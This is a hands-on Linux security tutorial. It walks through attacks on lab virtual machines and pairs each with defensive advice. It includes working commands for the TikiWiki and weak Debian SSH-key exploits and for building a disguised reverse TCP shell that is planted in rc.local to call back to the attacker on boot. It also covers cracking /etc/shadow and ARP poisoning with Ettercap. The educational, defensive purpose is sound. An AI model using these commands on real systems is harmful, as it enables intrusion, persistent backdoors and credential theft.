Learn to hack linux
Attack servers, crack passwords, exploit services, beat encryption - everything you need to protect yourself from evil.
There are two rules of computer security: one – don’t buy a computer; and two – if you have to buy a computer, don’t turn it on. If you break these rules then you’ll be opening yourself up to potential problems. No system is 100% safe from hackers, but by following a few simple steps you can make yours much harder for intruders to attack.
Hacking is the art of gaining access to a computer system that you’re not supposed to access. Its practitioners exploit bugs and glitches in software to make it perform in ways it’s not supposed to. We’ll look at two ways in which they do this, and show you how to stop yourself from becoming a victim. We’ll gain root access to a system that will enable us to do anything we wish – from stealing information to wiping the hard drives.
The attacks are real and performed on actual Linux systems (though in one case we use an out-of-date system). Read on to find out how an attacker could steal your data or hijack your machine – and how to defend your system. Because to protect yourself, you have to know what you’re protecting yourself from.
Attacking a server
When most people think of hacking, they picture someone on a computer connected to a network somehow attacking and gaining access to another computer on the network. This is what we mean by attacking a server. We will use the BackTrack distribution, which set up specifically for penetration testing (as hacking your own system is called) as our attacker. A virtual machine disk image called Metasploitable, which is deliberately vulnerable to attacks, will be our victim.
The Metasploit Framework is a system for bringing various exploits, backdoors, scanning systems and payloads to one place – it’s a command line tool, but we will use a graphical interface for it. On the BackTrack machine, run Applications > BackTrack > Exploitation Tools > Network Exploitation Tools > Metasploit Framework > Armitage. In the new window, click Start MSF and wait for the main window to open.
Go to Hosts > Nmap Scan > Intense Scan, and when prompted enter the IP range 192.168.56.0/24 (If you’ve changed the settings on the VirtualBox DHCP server, you will need to change this), and wait until the application prompts you that the scan is complete.
This will find four hosts: one for the host machine, one for the DHCP server, one for the BackTrack machine, and one for the Metasploitable server. To find out what attacks we can launch on these hosts, go to Attacks > Find Attacks > By Port, and wait until you get the message saying Attack Analysis Complete. The hardest part of attacking a server is knowing which exploits to use. In this case, we know that the victim is running TikiWiki, which has a PHP exploit that allows us to execute code.
Had the administrator run Nessus Scanner on Metasploitable, they'd have found it was running a vulnerable SSH key generator and could have protected themselves from this attack.
Right-click on the Metasploitable host (if you’re not sure which one it is, open up a terminal and type ifconfig. This will give you the IP address for the current machine. The host machine will have the IP 192.168.56.1, the DHCP server will be 192.168.56.100 and the Metasploitable server will be the remaining one), and go to Attack > webapp > Tikiwiki_graph_formula_exec. Make sure LHOST is set to the IP of the BackTrack machine, and click launch. After the exploit has run, the icon of the host should go red to show that it has been successful. Right-click on the host again and go to Shell > Interact. This will open a tab – a minimal shell running on the victim machine. To test it, enter whoami, and it will let you know that you have hijacked the user www-data. This shell is limited – you can’t even use cd to move to a different directory, but we can extract a few pieces of information. For example, entering
ls /homewill give us a list of the users on the system. Metasploitable is built on Ubuntu 8.04, and there was a problem with the SSH key generator in Ubuntu versions 7.04 – 8.04. It created the keys from a random number, but the random number took the process ID as its seed. Since the number of processes is capped at 37,768, it would generate only that many different keys. With a number of keys this small, it’s easy to force our way in.
Before we can start this attack, we need to find out which public keys the system will allow us to log in with. Go back to the Armitage shell and enter:
This will output one 2048-bit RSA public key, authorised to log in to the root account. If we can find the corresponding private key, we can SSH into the root account without a password. Normally, there would be too many to check, but since we know that the key generator has a weakness, we need to check only a few.
All possible key pairings are available at www.digitaloffense.net/tools/debian-openssl. Use the link titled: SSH 2048-bit RSA Keys X86 (48.0M). Unzip the file by opening a terminal and running:
tar xjf debian debian_ssh_rsa_2048_x86.tar.bz2
then move into the new directory with:
This directory now contains every key pairing generated by the faulty Debian key generator. To find the right one, type:
grep -li AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNL0ibMNAL *.pubwhere
is the first section of the public key we found on the server – since there are so few possible keys, we don’t need to enter the whole lot. It will find one key file:
You can now log in to the server with the command
ssh -i ~/rsa/2048/57c3115d77c5639o332dc5c49978627a-5429 firstname.lastname@example.org
192.168.56.102is the IP of the Metasploitable server. You will now have root access to the server, and can make any changes you like, or steal any data.
Reducing the number of services available on your server to only those necessary will increase the security. For example, if you run only HTTP, SSH, and SFTP, and not Telnet and FTP, you will have reduced by 40% the number of potentially exploitable services compared to if you ran all five, yet not reduced the number of features available to users. To perform this attack, we used known attacks on out-of-date software, and the key to protecting yourself is to always keep up with security patches. In addition to this, you can scan computers for known security holes using vulnerability scanners, such as Nessus (www.nessus.org ). This is commercial software, but free for home use. Once installed, you will need to register on the website. A key will be emailed to you along with instructions on how to activate the software and add a user. After doing this, you can access it through the web interface at http://localhost:8834.
Armitage provides a graphical interface to the Matasploit Framework, which has more than 700 different ways of breaking into a server.
Security patches and scanners will protect you only against known vulnerabilities. Zero-day attacks are attacks that happen before the security community has discovered, and fixed, the vulnerability. These are much harder to protect against.
As well as trying to make sure that the software you’re running is as secure as possible, you can also set up your system to monitor suspicious activity. A Network Intrusion Prevention System (NIPS), such as Snort, will monitor network activity and report any unusual connections. We tested this by running the scans in the above attack on Security Onion (a distro with Snort set up as default), and it registered 278 security events. By running a system such as this, and keeping an eye on the unusual events, you can identify potential attacks before they happen.
One of the two attacks here took place against a web application (TikiWiki), and this sort of software is a popular target for hackers. It offers plenty of potential security holes, many of them through poor validation on input boxes, which allow attackers to execute arbitrary code. With web applications, it’s even more important that you have the most up-to-date version, since attacks are easy to mount once a vulnerability is known.
Attacking a personal computer
From a hacker’s point of view, the main difference between a server and a personal computer is that a server has various ports open (such as http or FTP), whereas a desktop does not. This means that when we attack a desktop, we have to take a different approach. If you can get physical access to a computer, getting data off it is simple. The easiest way to do this is to insert a live distro into the CD drive or USB port, then boot up and mount the hard drive. This should give you full access to the entire hard disk. However, if the user has been security conscious, and encrypted all or part of the disk, then it will be more difficult.
In some distributions (such as Ubuntu), the user is able to encrypt their home partition. This means that when you boot in a live distro, you will be able to see the shared data on the root partition, but none of the user’s files. There are no known attacks on the modern encryption algorithms used, but that doesn’t mean we can’t find a way of getting in; it just requires a little cunning. Here, we will place a trojan horse on the machine to enable us to access the files after the user has mounted the partition.
You can try this out for yourself using VirtualBox. These steps work with Ubuntu as the victim distro, and BackTrack as the distro for the hacker, but you could use other ones, providing they have the required features. The victim needs to have an encrypted home directory, and the attacking system needs Metasploit Framework. First, you need to create a virtual machine with a recent version of Ubuntu installed, making sure to check Encrypt My Home Folder on the user creation page. The machine should have its network adapter set to Host-only.
With the operating system installed and the virtual machine running, go to Devices > CD/DVD Devices and make sure that the Ubuntu install CD is not selected, and select the BackTrack ISO instead. Reboot the system. This will bring up BackTrack in the same manner as using the live CD on a machine with Ubuntu installed. At the Boot Options page, press enter to select BackTrack Text – Default Boot Text Mode. By default, the system will log you in as root in a text-only environment.
To start the desktop, type:
startxWe need to mount the Ubuntu drive, so open up a terminal (Ctrl+Alt+T) and type:
mkdir /mnt/victim mount /dev/sda1 /mnt/victim
You can now navigate around the hard drive, but if you try to go to the home directory, you will find only a text file saying that the contents are encrypted.
Set up the attacking computer the same way as in Attacking a server. Run ifconfig to find out the IP address.
On the victim computer, create the trojan horse – in this case a reverse tcp shell – using msfpayload by typing:
msfpayload linux/x86/shell/reverse_tcp LHOST=192.168.56.101 LPORT=443 X > /mnt/victim/bin/UbuntuUpdate
where 192.168.56.101 is the IP address of the attacker. This command creates an executable called UbuntuUpdate (an innocuous-sounding program so the user doesn’t get suspicious if they see it in the process list) that will connect to the attacking machine on port 443. Make it executable with:
chmod +x /mnt/victim/bin/UbuntuUpdate
Now we need to make it run. Using your favourite text editor, add the line
/bin/UbuntuUpdateto the file /mnt/victim/etc/rc.local immediately before the line
This file gets executed every time the computer boots up. With the victim’s computer ready, we can set our attacking computer ready to listen for the connection. Open up a terminal on it and enter:
msfcli exploit/multi/handler PAYLOAD=linux/x86/shell/reverse_tcp LHOST=192.168.56.101 LPORT=443 E
To launch the attack, reboot the victim computer without the live CD in (in the virtual machine window’s menu bar, go to Devices > CD/DVD Devices and uncheck the BackTrack CD). Once it gets to the login screen, it will have connected with the attacker. In the terminal you ran msfcli in, you should now have shell access to the victim computer (there’s no command prompt). If you enter the command whoami, you will get the response root.
There is another way to break in to the server using a vulnerability in Distcc. To get more familiar with the Metasploit Framework, try gaining access using this from msfconsole.
Since rc.local runs with superuser permissions, that follows through to our remote session. From the remote terminal, we can now browse files, run code, add users and do anything else that takes our fancy. We can’t, however, mount the home directory without the user’s password, so we have to wait for the user to log in.
As soon as the user enters their password on the victim computer, the system will mount the encrypted volume, and we can browse, edit or delete files as though they weren’t encrypted.
Set a BIOS password
You can stop someone booting up your machine with a live distro by removing the CD and USB options from the boot order list in BIOS, and then setting a BIOS password to prevent an attacker adding them again. A more determined attacker could still remove the drive from your machine and connect it to another, where they could mount it. The only way to protect yourself completely against this form of attack
msfcli exploit/multi/handler PAYLOAD=linux/x86/shell/reverse_tcp LHOST=192.168.56.101 LPORT=443 Eis to encrypt your entire hard drive – and use a good password.
THC-Hydra is another password-guessing tool. Unlike John The Ripper, Hydra will crack passwords over a network.
Most major distros support full disk encryption. Adding it to a fresh install is usually just a case of selecting Encrypted LVM at the partition stage of the install. Ubuntu users will have to use the alternate install CD, since this option isn’t supported on a normal install. Whether or not this is necessary depends on how likely your machine is to fall into the hands of an attacker and how valuable the information on it is. Generally, laptops are more vulnerable than desktops, since they’re more likely to get lost or stolen.
In the example, we showed how an attacker could install a trojan horse, but an attacker could get the same effect by tricking a user into running the code. It could even be included in a DEB or RPM file for some other piece of software. The best way to protect yourself from this form of attack is to run only software from reliable sources, such as the official repositories for your distribution. These sources should be cryptographically signed to ensure they haven’t been tampered with. Removable devices, such as USB memory sticks, can include code set to run automatically when the drive is inserted, but Linux should always prompt you for confirmation before running the program. If you’re not sure that the code is legitimate, don’t run it.
The tool Tripwire can check which files on a system have changed. When first run, it creates a database of hashes of every file on the system, and then a user can run it again at a later time to see which ones have changed. It can’t tell you why they’ve changed (for example, if it’s a legitimate update, or if an attacker uploaded some malicious code), and it’s up to the user to discover this. Using the -P flag signs the database with a particular passphrase. If this is not done, then an attacker can write over the database with hashes for the altered files.
You can crack any password with enough guesses, but a good password will take so long to guess that by the time the attacker has found it, it’s useless. For example, if you can try 100 passwords every second, and you know that a password is a dictionary word (there are around 200,000 words in the full Oxford English Dictionary), then it will take 2,000 seconds, or 33 minutes, to find the password.
Obviously, we want our passwords to last longer than this, so we need to make them less predictable. If a password is a random string of letters, then the number of possible combinations is the number of options multiplied by itself for every character. For example, a five-character string of lower-case letters (26 options) could be any one of 26 * 26 * 26 * 26 * 26, or 11,881,376, possible passwords. At the same rate of guessing, this would take 118,814 seconds – 33 hours.
An attacker could be this cruel.
It will get 26 times longer for every digit added, so a random six-character lower-case password will take 35 days to guess, and a seven-character one will take two-and-a-half years. Of course, this assumes 100 checks per second – the actual time it will take could be much higher or lower depending on the system. John The Ripper is a password-cracking tool that will mount dictionary attacks against password hashes. It usually comes in a package called John, and it’s available from www.openwall.com/john/. To find out how quickly you can break passwords, run a benchmark test by entering:
john --testThis is the speed at which you can crack passwords when you have the hashes; running a brute force attack across a network is much slower.
Instead of increasing the length of a password, you could increase the character set. For example, a five-character string containing upper and lower-case letters and the digits 0-9 has 62 * 62 * 62 * 62 * 62, or about 92,000,000 possible options. At the same rate of cracking as before, this would take 916,132 seconds, or 10.6 days, with six and-seven character strings taking 1.8 years and 112 years respectively.
The problem with hard-to-crack passwords is that they’re usually hard to remember. One solution proposed by Randall Munroe at xkcd.com is to use multiword passwords, for example four unrelated words together in lower case. If we assume an attacker knows the structure of the words, we can treat it as a string of four characters where each character is a word. If we limit ourselves to 2,000 commonly-used words, the number of potential passwords is 2,000 * 2,000 * 2,000 * 2,000, or 16 trillion which, under the same conditions, would take 160 billion seconds, or 5,073 years, to crack. The password cameratrainingrassminister is more secure than 5Hjs9gE, and easier to remember.
One way to find out how secure your passwords are is to try to crack them using John The Ripper. First, you need to run unshadow to combine /etc/passwd, which contains the user’s account details with /etc/shadow, which contains the password hashes.
sudo unshadow /etc/passwd /etc/shadow > hashesthen you can run John The Ripper with:
If you get a message saying that no hashes were found in the file, then you’re using an old version of John The Ripper and you need to get the latest one from the website. This will try to crack every password on the system so you can find out if any user is using a guessable password. If your passwords are complex enough, this command will never terminate; it will keep on trying to crack for days, weeks, and even years until it finds the password, or you terminate it with Ctrl+C. This is a tool for web developers, and you’ll need some knowledge of HTTP, HTML and SQL to complete the exercises.
Attacking a network
When you store information on a computer you can control it, set access rules and record which user made what changes to the data. However, as soon as information leaves the computer and heads out into a network, you lose this control.
Networks are open systems that computers can join and leave, and most common networking protocols have placed simplicity over security in their design. An attacker can exploit this weak point to glean data, and even control what you can send and receive. The simplest way they can do this is by listening to data that’s moving over the network. WireShark is one of the most versatile tools for sniffing network traffic. After installing (either through your distro’s package manager, or with files from www.wireshark.org), you can start it with:
Click on Pseudo-device, which captures on all interfaces to start acquiring packets from the network (including those sent by the machine it’s running on). If there’s anything sending data, you will see a flood of information about the packets. In order to pick out the information you want, you need to set up a filter. For example, the filter:
http.request.uriwill display all packages with information about HTTP requests, while:
ftp.request.command contains “USER”or
ftp.request.command contains “PASS”will pick up all FTP usernames and passwords. Since the FTP protocol sends this information unencrypted, you can simply read the login details from the Info column. To try this out, you can either log in to an FTP server, or download the sample capture iseries.cap from wiki.wireshark.org/SampleCaptures.
However, depending on the network setup, you may find that you don’t get much information flowing to your computer to listen from. This is because most modern network hubs are switched. That is, they send packets only to the computer they’re addressed to. To get round this, an attacker can use Address Resolution Protocol (ARP) spoofing. This tricks all other computers on the network into sending their information to the attacker, who then forwards it on to the intended recipient. You can test this out on your network (or another network you have permission to attack) using Ettercap-NG (ettercap.sourceforge.net ).
Start the graphical interface with:
sudo ettercap -Gthen go to Sniff > Unified sniffing, and select the network interface. In order to poison the ARP tables, you need to know what machines are on the network, so go to Hosts > Scan For Hosts. To start the attack, click MITM > ARP Poisoning, then click OK. Now everything is set up, go to Start > Start Sniffing. Once this has run, go to Hosts > Host List, and highlight each of the victims. Click Add to Target 1.
You can run arp on the victims’ machines. If the ARP poisoning has worked, all the IP addresses will point to the same MAC address.
You should now find that more information comes through WireShark. You can even use Ettercap to control the network. For example, if you go to View > Connections, you will see a list of all the TCP and UDP connections on the network. You can cut any of them off by highlighting them and clicking Kill Connection.
To protect yourself when communicating over a network, you have to make sure you use the secure protocols. For example, use SSH instead of Telnet (making sure you use version 2 of the SSH protocol by using the flag -2) and SFTP instead of FTP. When it comes to web browsing, you’re limited by the security offered by the web server. Some websites are available over the secured HTTPS protocol, whereas others are available only in plain HTTP.
In order to help you keep your web browsing away from prying eyes, the Electronic Frontier Foundation has produced a Firefox plug-in called HTTPS Everywhere (www.eff.org/https-everywhere). This doesn’t increase the level of protection compared to HTTPS, but instead it forces you to use the secure protocol if the website supports it.
John The Ripper is a fast cracking tool for running brute force attacks against password hashes.
These forms of encryption will prevent an eavesdropper from reading any of the data, but they’ll be able to tell which computers are communicating with each other. You can prevent an attacker from seeing this information using Tor (www.torproject.org). The easiest way is through their Browser Bundle. To anonymise your web browsing, simply download, unzip and run start_tor_browser. This will connect to the Tor network (a set of relays located around the world), then open a web browser. When you browse the web using this software, the data will be shuffled securely through a chain of computers, making it impossible for any listener to know what sites you’re looking at.
In addition to web browsers, usewithtor allows other applications to communicate over the Tor network. Details of what software works with this system are on the Tor website (https://trac.torproject.org/projects/tor/wiki/doc/TorifyHOWTO). You can protect yourself from ARP spoofing in a number of different ways. Running arpwatch or arpalert will report incidences of ARP spoofing to the system logs, while ArpON will attempt to stop the attack.